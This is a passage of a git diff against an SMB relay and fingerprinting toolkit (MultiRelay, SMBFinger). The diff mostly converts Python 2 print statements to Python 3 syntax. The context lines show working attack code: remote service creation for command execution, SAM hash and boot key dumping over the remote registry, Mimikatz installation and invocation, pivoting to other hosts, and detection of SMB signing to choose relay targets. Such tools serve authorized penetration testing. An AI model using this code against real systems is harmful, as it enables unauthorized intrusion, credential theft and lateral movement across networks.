ServiceNameChars, ServiceIDChars, f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC Create Service. @@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): buffer1 = longueur(packet0)+packet0 s.send(buffer1) data = s.recv(2048) - #print "[+] Creating service" + #print ("[+] Creating service") ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) ContextHandlerService = data[88:108] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLControlService, stop operation. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00") @@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLDeleteService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) @@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to delete the service.\n" + print ("[+] Failed to delete the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) + #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)) #ContextHandlerService = data[88:108] ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + print ("[+] Failed to start the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s): ##Error handling. if data[8:10] == "\x2e\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC SVCCTLOpenService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + print ("[+] Failed to create the service\n") return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) + #print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)) #ContextHandlerService = data[88:108] ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLStartService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + print ("[+] Failed to open the service.\n") return ModifySMBRetCode(data) ContextHandlerService = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLQueryService. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to stop the service.\n" + print ("[+] Failed to stop the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) @@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s): ## DCE/RPC SVCCTLCloseService if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to query the service.\n" + print ("[+] Failed to query the service.\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) @@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s): data = s.recv(2048) if data[8:10] == "\x2d\x22": - print "[+] Can't open the file, access is denied (write protected file?)." + print ("[+] Can't open the file, access is denied (write protected file?).") f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f @@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s): ##OpenAndX. if data[8:10] == "\x2d\x34": - print "[+] The command failed or took to long to complete." + print ("[+] The command failed or took to long to complete.") return data, s ##all good. @@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, data = s.recv(2048) if data[8:10] == "\xa2\x22": - print "[+] Can't open the file, access is denied (write protected file?)." + print ("[+] Can't open the file, access is denied (write protected file?).") f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f if data[8:10] == "\xa2\x35": - print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename + print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename) f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack. #We'll recover that connection.. return data, s, f @@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access, ##OpenAndX. if data[8:10] == "\xa2\x34": - print "[+] The command failed or took to long to complete." + print ("[+] The command failed or took to long to complete.") return data, s ##all good. @@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s): ##Do large reads.. if data[8:10] == "\x2e\x00" and struct.unpack(" 65520. first = filesize-65520 @@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.'%(minutes) + print ('Downloaded in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + print ('Downloaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2e\x00": @@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s): count = 0 bar = 80 start_time = time.time() - print 'File size: %s'%(GetReadableSize(FileSize)) + print ('File size: %s'%(GetReadableSize(FileSize))) for i in xrange(count_number): count = count+1 Chunk = FileContent[dataoffset:dataoffset+30000] @@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Uploaded in: %.3g minutes.'%(minutes) + print ('Uploaded in: %.3g minutes.'%(minutes)) if Seconds<60: - print 'Uploaded in: %.3g seconds'%(Seconds) + print ('Uploaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2f\x00": @@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s): ##Do large reads.. if data[8:10] == "\x2e\x00" and struct.unpack(" 65520. first = filesize-65520 @@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s): Seconds = (time.time() - start_time) - READTIMEOUT if Seconds>60: minutes = Seconds/60 - print 'Downloaded in: %.3g minutes.\n'%(minutes) + print ('Downloaded in: %.3g minutes.\n'%(minutes)) if Seconds<60: - print 'Downloaded in: %.3g seconds'%(Seconds) + print ('Downloaded in: %.3g seconds'%(Seconds)) ##Close Request if data[8:10] == "\x2e\x00": @@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host): data = s.recv(2048) if data[8:10] == "\x06\x21": - print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process." - print "[+] Try taskkill /F /IM process_name, then delete the file." + print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.") + print ("[+] Try taskkill /F /IM process_name, then delete the file.") return data, s if data[8:10] == "\x06\x34": - print "[+] Delete Failed. File not found." + print ("[+] Delete Failed. File not found.") return data, s if data[8:10] == "\x06\x00": @@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath): ## DCE/RPC Query Info. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to read the key\n" + print ("[+] Failed to read the key\n") return ModifySMBRetCode(data) ContextHandler = data[84:104] head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) @@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath): ## DCE/RPC CloseKey. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to close the key\n" + print ("[+] Failed to close the key\n") return ModifySMBRetCode(data) head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) @@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData): Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] for i in range(len(JDSkew1GBGData)): Key += JDSkew1GBGData[Xored[i]] - print 'BootKey: %s' % Key.encode("hex") + print ('BootKey: %s' % Key.encode("hex")) return Key ##########Dump Hashes############# @@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host): data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." + print ("The Windows Remote Registry Service is sleeping, waking it up...") time.sleep(3) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "Retrying..." + print ("Retrying...") time.sleep(5) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) @@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host): ##Error handling. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" + print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ##Grab the keys if data[8:10] == "\x25\x00": @@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host): Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp") WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt") except: - print "[+] Live dump failed, is python-crypto installed? " + print ("[+] Live dump failed, is python-crypto installed? ") pass - print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt" + print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt") return data except: #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########Save An HKLM Key And Its Subkeys############# @@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key): data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." + print ("The Windows Remote Registry Service is sleeping, waking it up...") time.sleep(3) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) if f == "PipeNotAvailable": - print "Retrying..." + print ("Retrying...") time.sleep(5) data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) @@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key): ##Error handling. if data[8:10] == "\x25\x00": if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" + print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") return ModifySMBRetCode(data) data,s,handler,f = OpenHKLM(data,s,f) data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) if data[8:10] != "\x25\x00": - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) data,s = CloseFID(f, data, s) data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) @@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key): #After everything has been cleaned up, we write the output to a file. WriteOutputToFile(Output, Host+"-"+Key+".tmp") - print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp" + print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp") return data except: #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########ReadAFile############# @@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host): File = File.replace("/","\\") data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,Output = GrabAndRead(f, File, data, s) - print Output + print (Output) return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Read failed. Remote filename was typed correctly?" + print ("[+] Read failed. Remote filename was typed correctly?") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. def GetAfFile(data, s, File, Host): @@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host): data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,Output = GrabAndRead(f, File, data, s) WriteOutputToFile(Output, Host+"-"+File) - print "[+] Done." + print ("[+] Done.") return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Get file failed. Remote filename was typed correctly?" + print ("[+] Get file failed. Remote filename was typed correctly?") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. ##########UploadAFile############# @@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host): return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Write failed." + print ("[+] Write failed.") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. ##########DeleteAFile############ @@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host): data,s = CloseTID(data, s) return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Delete operation failed.\n[+] Something went wrong." + print ("[+] Delete operation failed.\n[+] Something went wrong.") data,s = CloseTID(data, s) return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. @@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi time.sleep(1) data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s) - print Output + print (Output) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) Logs.info('Command executed:') @@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########Runas############# @@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) time.sleep(1) data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s) - print Output + print (Output) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) Logs.info('Command executed:') @@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) except: data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########MimiKatz RPC############# @@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): @@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam return ModifySMBRetCode(data) except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32." + print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.") return ModifySMBRetCode(data) ##########Pivot############# @@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath, except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########VerifyPivot############# @@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########DoSomethingDumb############# diff --git a/tools/MultiRelay/RelayMultiPackets.py b/tools/MultiRelay/RelayMultiPackets.py index bba63a3..8f8c876 100644 --- a/tools/MultiRelay/RelayMultiPackets.py +++ b/tools/MultiRelay/RelayMultiPackets.py @@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet): SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) NTLMData = str(self.fields["Data"]) - ###### ASN Stuff + ###### ASN Stuff if len(NTLMData) > 255: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" - self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) + self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" + self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) else: self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" - self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) + self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) if len(NTLMData)-8 > 255: self.fields["AsnSecMechLenOfLen"] = "\x82" - self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) + self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) else: self.fields["AsnSecMechLenOfLen"] = "\x81" - self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) + self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) if len(NTLMData)-12 > 255: self.fields["ChoosedTagLenOfLen"] = "\x82" diff --git a/tools/SMBFinger/Finger.py b/tools/SMBFinger/Finger.py index 682b0c1..729095c 100755 --- a/tools/SMBFinger/Finger.py +++ b/tools/SMBFinger/Finger.py @@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet): ##################### def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) def IsSigningEnabled(data): if data[39] == "\x0f": @@ -141,27 +141,27 @@ def dtoa(d): return inet_ntoa(struct.pack("!L", d)) def OsNameClientVersion(data): - try: - length = struct.unpack(' 255: - OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion + OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) + return OsVersion, ClientVersion if length <= 255: - OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - except: - return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" + OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) + return OsVersion, ClientVersion + except: + return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" def GetHostnameAndDomainName(data): - try: - DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) + try: + DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) #If max length domain name, there won't be a \x00\x00\x00 delineator to split on - if Hostname == '': - DomainJoined = data[81:110].replace('\x00','') - Hostname = data[113:].replace('\x00','') - return Hostname, DomainJoined - except: - return "Could not get Hostname.", "Could not get Domain joined" + if Hostname == '': + DomainJoined = data[81:110].replace('\x00','') + Hostname = data[113:].replace('\x00','') + return Hostname, DomainJoined + except: + return "Could not get Hostname.", "Could not get Domain joined" def DomainGrab(Host): s = socket(AF_INET, SOCK_STREAM) @@ -169,7 +169,7 @@ def DomainGrab(Host): s.settimeout(Timeout) s.connect(Host) except: - print "Host down or port close, skipping" + print ("Host down or port close, skipping") pass try: h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") @@ -191,7 +191,7 @@ def SmbFinger(Host): s.settimeout(Timeout) s.connect(Host) except: - print "Host down or port close, skipping" + print ("Host down or port close, skipping") pass try: h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") @@ -252,10 +252,10 @@ def ShowResults(Host): Signing, OsVer, LanManClient = SmbFinger(Host) enabled = color("SMB signing is mandatory. Choose another target", 1, 1) disabled = color("SMB signing: False", 2, 1) - print color("Retrieving information for %s..."%Host[0], 8, 1) - print enabled if Signing else disabled - print color("Os version: '%s'"%(OsVer), 8, 3) - print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3) + print (color("Retrieving information for %s..."%Host[0], 8, 1)) + print (enabled if Signing else disabled) + print (color("Os version: '%s'"%(OsVer), 8, 3)) + print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)) except: pass @@ -288,7 +288,7 @@ def ShowScanSmallResults(Host): Hostname, DomainJoined = DomainGrab(Host) Signing, OsVer, LanManClient = SmbFinger(Host) Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing) - print Message + print (Message) except: pass @@ -299,13 +299,13 @@ def ShowSigning(Host): s.settimeout(Timeout) s.connect((Host, 445)) except: - print "[Pivot Verification Failed]: Target host is down" + print ("[Pivot Verification Failed]: Target host is down" ) return True try: Signing = SmbFingerSigning(Host) if Signing == True: - print "[Pivot Verification Failed]:Signing is enabled. Choose another host." + print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.") return True else: return False